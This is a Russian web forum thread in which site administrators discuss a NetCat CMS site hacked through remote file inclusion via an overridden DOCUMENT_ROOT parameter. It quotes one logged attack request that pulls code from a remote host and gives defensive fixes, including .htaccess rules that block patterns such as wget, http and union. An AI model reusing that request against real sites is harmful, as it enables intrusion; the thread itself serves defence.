Уязвимость NetCat?

12
Shema
На сайте с 01.12.2005
Offline
176
5044

Срочный вопрос для пользователей CMS NetCat:

Мне достался сайт на NetCat на вычищение троянов оттуда (Судя по всему это NetCat Small Business). Сайт ломают через переопределение переменной DOCUMENT_ROOT, передавая её через GET-запрос, скачивая руткит (по версии Касперского - это Exploit.Linux.Small.f/Exploit.Linux.Smallby, плюс ещё несколько хактулов) с удалённого сервера.

В настройках .htaccess стоит php_value register_globals 1. Если ставить в 0, то NetCat перестаёт работать.

Внимание вопрос: NetCat не умеет работать без register_globals??? Если умеет, как заставить?

Ситуация ещё усугубляется тем, что на хостинге (от nic.ru) апач запущен с правами пользователя, а не nobody, поэтому нет никакой возможности защитить файлы и директории от модификации.

Форум поддержки NetCat фееричен: при попытке создать новую тему получаю сообщение дословно


В компании АИСТ (разработчик NetCat) открыта вакансия веб-разработчика.

Warning: require_once(/var/www/vhosts/netcat.ru/httpdocs/netcat/modules/forum/_newtopic.inc.php)
[function.require-once]: failed to open stream: ЅХв вРЪЮУЮ дРЩЫР ШЫШ ЪРвРЫЮУР in /var/www/vhosts/netcat.ru/httpdocs/netcat/modules/forum/function.inc.php on line 1190

Fatal error: require_once() [function.require]: Failed opening required '/var/www/vhosts/netcat.ru/httpdocs/
netcat/modules/forum/_newtopic.inc.php' (include_path='/var/www/vhosts/netcat.ru/httpdocs/netcat/require/lib/') in /var/www/vhosts/netcat.ru/httpdocs/netcat/modules/forum/function.inc.php on line 1190

Кто что посоветует? а то официальных саппортов ждать до понедельника не хочется :fire:

Студия Design Coda (http://www.designcoda.ru/). Личные контакты: +7(903)1367564, skype:andrey.oshemkov, telegram:@oshemkov. WMID: 492025973671 (https://passport.webmoney.ru/asp/certview4.asp?wmid=492025973671), делаем и рекламируем сайты, мобильные приложения, ботов для Telegram.
kXk Our DevOPs
На сайте с 30.01.2005
Offline
988
#1

Shema, Выкинуть хостинг от Nic.ru поставить сайт на впс и настроить как душе угодно :)

Buy lifetime vps ( https://ddosov.net/lifetime-vds )
Shema
На сайте с 01.12.2005
Offline
176
#2

kxk, все свои проекты мы размещаем только на собственных серверах с нормально настроенной безопасностью. Эти клиенты достались вместе с сайтом и хостингом. Кстати в последнее время тенденция, что если клиент покупает домен в nic.ru, ему впаривают их же хостинг на год.

Но в топике вопрос про NetCat. Я пока заткнул дырку с переменной DOCUMENT_ROOT, на сам факт "register_globals on" меня очень напрягает, так как это потенциальная дыра с широкими возможностями для взлома :)

dkameleon
На сайте с 09.12.2005
Offline
386
#3
Shema:

Ситуация ещё усугубляется тем, что на хостинге (от nic.ru) апач запущен с правами пользователя, а не nobody, поэтому нет никакой возможности защитить файлы и директории от модификации.

а если права поставить 0555/0444?

может какие-то правки в свой конфиг ПХП вносить можно? запрет на часть системных/файловых функций.

Дизайн интерьера (http://balabukha.com/)
Shema
На сайте с 01.12.2005
Offline
176
#4

dkameleon, если апач работает от имени пользователя, то установка прав ничего не решает.

все файлы принадлежат пользователю => менять права может сам пользователь

апач запущен от имени пользователя => любой скрипт сайта может изменить права на любой файл пользователя

То есть, если на сайте найдётся уязвимость, позволяющая выполнить php/perl-код, то через неё можно абсолютно любым образом модифицировать исходники сайта.

Запуск веб-сервера из-под пользователя имеет ряд плюсов: например, исключается возможность взлома других аккаунтов на хостинге через дырявые скрипты одного, а также убавляется проблем с настройкой правильных прав на файлы и директории и, как следствие, нагрузка на тех.поддержку хостинга. Но ряд минусов, связанных с безопасностью внутри аккаунта перечеркивает эти плюсы.

Shema добавил 02.05.2009 в 16:08

dkameleon:

может какие-то правки в свой конфиг ПХП вносить можно? запрет на часть системных/файловых функций.

Взлом делался на редкость красиво и просто - никаких специальных функций.

Запрос вида

64.118.90.253 - - [01/May/2009:17:59:52 +0400] "GET //index.php?DOCUMENT_ROOT=http://www.footnoteibs.com/b1ttletX.txt??? HTTP/1.1" 200 606 "-" "libwww-perl/5.823"

позволял выполнить код по ссылке http://www.footnoteibs.com/b1ttletX.txt (можете скачать посмотреть, там скрипт безобидный plain-текстом, просто скачав, вирус не подцепите; но когда этот код оказывается внутри сайта, он начинает выполняться с правами сайта).

Виной в данном случае - кривая настройка NetCat (жесткое прописывание в конфигах переменной DOCUMENT_ROOT вроде решило проблему). Но если бы не было register_globals такая уязвимость даже теоретически не смогла бы появиться.

funky
На сайте с 15.02.2009
Offline
35
#5

1. раскомментировать и прописать правильный $DOCUMENT_ROOT в /netcat/vars.inc.php

2. добавить в корневой .htaccess

php_value allow_url_include off

php_value allow_url_fopen off

DI
На сайте с 03.01.2007
Offline
123
#6

Small Business - это по сути бесплатная версия, которая была выпущена в 2004 году, и после этого практически не поддерживалась. Чаще всего рекомендуют обновиться до какой-нибудь актуальной платной версии:)

Если этого делать не хочется - то в прошлом году для SB был выпущен патч, закрывающий на тот момент все известные дырки (и эти в том числе). Патч вроде раздается бесплатно, по крайней мере, в личном кабинете точно, но и по почте наверняка смогут выслать:)

Как временный вариант, решение выбрано правильно - в файле netcat/vars.inc.php вручную прописать нужный DOCUMENT_ROOT, этот файл обрабатывается в самом начале.

Высказывание идиотского утверждения требует на порядок меньше усилий, чем его последовательное и обоснованное опровержение и более того, иногда это опровержение вообще невозможно. © (http://zhurnal.lib.ru/s/shapiro_m_a/raspidiota.shtml)
Shema
На сайте с 01.12.2005
Offline
176
#7

funky, DenIT, да, уже сделано :)

ПЗ
На сайте с 10.10.2006
Offline
92
#8

КАк вариант еще в .htaccess прописать

RewriteCond %{THE_REQUEST} _SERVER|_GLOBALS|DOCUMENT_ROOT|INCLUDE_FOLDER|ROOT_FOLDER|FILES_FOLDER|ADMIN_FOLDER|TMP_FOLDER|MODULE_FOLDER [NC]

RewriteRule .* - [L,F]

Автомобили в России (http://www.autobb.ru/). Спецтехника BIZ - вся строительная, дорожная, коммунальная техника (http://www.spectehnika.biz/) и другая спецтехника в одном месте.
[Удален]
#9

Пропишите в .htaccess

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)union(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SERVER(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)DOCUMENT_ROOT(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SERVER[DOCUMENT_ROOT](.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)http(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)ftp(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)alert\(document(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

и будет Вам счастье 🍻

dkameleon
На сайте с 09.12.2005
Offline
386
#10

Павел Зотов, Федорыч, извращенчеги подтянулись :)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий